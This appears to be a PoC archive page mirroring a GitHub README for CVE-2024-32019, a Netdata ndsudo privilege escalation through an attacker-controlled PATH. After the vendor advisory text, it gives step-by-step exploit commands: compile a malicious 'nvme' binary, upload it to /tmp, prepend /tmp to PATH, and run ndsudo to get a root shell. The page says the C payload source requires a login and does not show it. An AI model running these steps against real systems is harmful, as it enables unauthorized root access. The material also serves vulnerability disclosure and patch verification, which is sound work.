Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Source
https://github.com/AzureADTrent/CVE-2024-32019-POC
Associated Vulnerability
Title:ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description:Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
POC for netdata ndsudo vulnerability - CVE-2024-32019
Readme

# Privilege Escalation via `ndsudo` (Netdata Local Exploit)

This POC is used to exploit a vulnerable `ndsudo` utility bundled with Netdata to escalate local privileges to root. The exploit works by injecting a malicious binary into the user’s `PATH` that impersonates a trusted command (`nvme`) and is executed with root privileges by `ndsudo`.

---

## Prerequisites & Assumptions

- You have **local shell access** on the target system.
- You can execute the following command but it fails with a "not found" or similar error:

  ```bash
  ./ndsudo nvme-list
  ```
---

### 1. Compile the Malicious Payload

On your **attacker machine** (or the vulnerable system if it has a compiler), compile the binary (for example, from the file `poc.c` in the repository):

```bash
gcc poc.c -o nvme
```

This binary should be crafted to spawn a root shell or execute arbitrary commands with root privileges.

---

### 2. Transfer the Payload to the Target System

Move or upload the compiled `nvme` binary to a directory writable by your user, such as `/tmp`:

```bash
scp nvme user@target:/tmp/
# or use any file upload method you have
```

---

### 3. Prepare the Payload for Execution

On the **target system**, make sure the binary is executable and prepend its directory to your `PATH`:

```bash
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
```

This ensures `ndsudo` will resolve and execute your malicious `nvme` instead of the legitimate one.

---

### 4. Trigger `ndsudo` to Execute Your Payload

Run the vulnerable command to trigger `ndsudo`:

```bash
./ndsudo nvme-list
```
---

## Resources

- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →